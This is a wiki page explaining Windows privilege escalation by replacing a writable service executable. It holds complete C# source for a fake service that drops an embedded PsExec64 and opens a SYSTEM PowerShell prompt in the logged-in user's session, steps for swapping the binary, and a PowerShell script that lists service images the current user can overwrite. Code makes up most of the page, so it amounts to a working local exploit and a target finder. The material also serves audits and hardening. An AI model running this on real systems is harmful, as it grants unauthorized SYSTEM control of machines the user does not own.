"Privilege escalation": difference between versions

From Banane Atomic
= [https://blog.didierstevens.com/2017/09/05/abusing-a-writable-windows-service/ With a writable Windows service] =
If the executable of a Windows service is writable by non-admin users (directly, or through a group such as Users or Authenticated Users), a low-privileged user can replace it with another executable. The Service Control Manager then starts that executable under the service's logon account, so if the service runs as LocalSystem the replacement can open a command prompt as NT AUTHORITY\SYSTEM. Check the logon account first (<code>sc qc &lt;service&gt;</code>): a service running as LocalService or NetworkService does not give SYSTEM.
<filebox fn='FakeService.cs'>
using System.Diagnostics;
using System.IO;
using System.ServiceProcess;
using System.Threading;

public class FakeService : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        // wait 10s for the user to log in and Windows to finish starting
        // (the SCM gives OnStart 30s by default before it declares the start failed)
        Thread.Sleep(10000);
        var psExecPath = ExtractPsExec();  // drop the embedded PsExec64.exe to disk
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";
        // Windows services run in session 0; the interactive user runs in session 1.
        // Use Sysinternals' PsExec to start powershell.exe (still as SYSTEM) in session 1.
        // -d: do not wait for the process to exit; -i 1: interactive, in session 1
        // (session 1 is the first console logon; check with `query session` if it differs).
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
        // stop the service after 1s, from another thread: Stop() would block if called inside OnStart
        Thread.Sleep(1000);
        new Thread(() => this.Stop()).Start();
    }

    private string ExtractPsExec()
    {
        // for a service running as SYSTEM, Path.GetTempPath() is C:\Windows\Temp
        var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe");
        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64);  // PsExec64.exe embedded as a project resource
        return psExecPath;
    }
}
</filebox>


<filebox fn='Program.cs'>
using System.ServiceProcess;

class Program
{
    static void Main(string[] args)
    {
        // hand control to the Service Control Manager, which calls FakeService.OnStart
        ServiceBase.Run(new ServiceBase[] { new FakeService() });
    }
}
</filebox>


# Replace the executable of the Windows service with the compiled application (keep a copy of the original so the service can be restored afterwards).
# When the service next starts (restart it, or reboot if the service's security descriptor does not let you start it), a PowerShell prompt running as SYSTEM opens in the interactive session.
<kode lang='dos'>
whoami
REM nt authority\system
</kode>
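The precondition for this technique is a service image that the current user can modify. The script below is an added example, not code from the original page or from Didier Stevens' post: it lists services whose image file carries an Allow ACE with WriteData for the current user or one of its groups, and reports the logon account and start mode so you can see which ones would actually yield SYSTEM and whether a reboot is enough to restart them. The PathName parsing and the ACL evaluation are my own; the cmdlets and .NET types used are standard Windows PowerShell 5.1.

```powershell
# Added example: find services whose image file the current user can overwrite.

function Get-ServiceImagePath {
    # Win32_Service.PathName is the raw command line: it may be quoted, carry
    # arguments (svchost.exe -k netsvcs) and use %SystemRoot%-style variables.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($PathName.Trim())
    if ($p.StartsWith('"')) { return $p.Split('"')[1] }
    # unquoted: the image path ends at the first ".exe" followed by a space or the end
    $m = [regex]::Match($p, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $null
}

function Test-CanWriteFile {
    # Evaluate the ACL instead of opening the file for write: a running service
    # image is locked (sharing violation) even when the ACL grants WriteData.
    param([string]$Path, [string[]]$Sids)
    try { $acl = Get-Acl -LiteralPath $Path } catch { return $false }  # no READ_CONTROL
    $write = [int][System.Security.AccessControl.FileSystemRights]::WriteData
    $allow = $false; $deny = $false
    foreach ($ace in $acl.Access) {
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }   # orphaned or untranslatable identity
        if ($Sids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $write) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Allow') { $allow = $true } else { $deny = $true }
    }
    return ($allow -and -not $deny)   # an explicit Deny ACE wins over any Allow
}

function Get-WritableServiceImages {
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # SIDs of the current user and of every group in its token (Users, Authenticated Users, ...)
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceImagePath -PathName $svc.PathName
        if (-not $exe -or -not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
        if (Test-CanWriteFile -Path $exe -Sids $sids) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName   # only LocalSystem gives NT AUTHORITY\SYSTEM
                StartMode = $svc.StartMode   # Auto: a reboot restarts the service for you
                State     = $svc.State
                Image     = $exe
            }
        }
    }
}

Get-WritableServiceImages | Format-Table -AutoSize
```

Two things the script does not cover: a Modify right on the image's directory is just as good (a running executable can be renamed on Windows, so you rename the original and drop the fake one under its name), and being able to write the file does not mean being able to restart the service (<code>sc sdshow &lt;service&gt;</code> shows who may start and stop it; otherwise wait for a reboot of an Auto-start service).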

Latest revision as of 20 February 2022, 16:07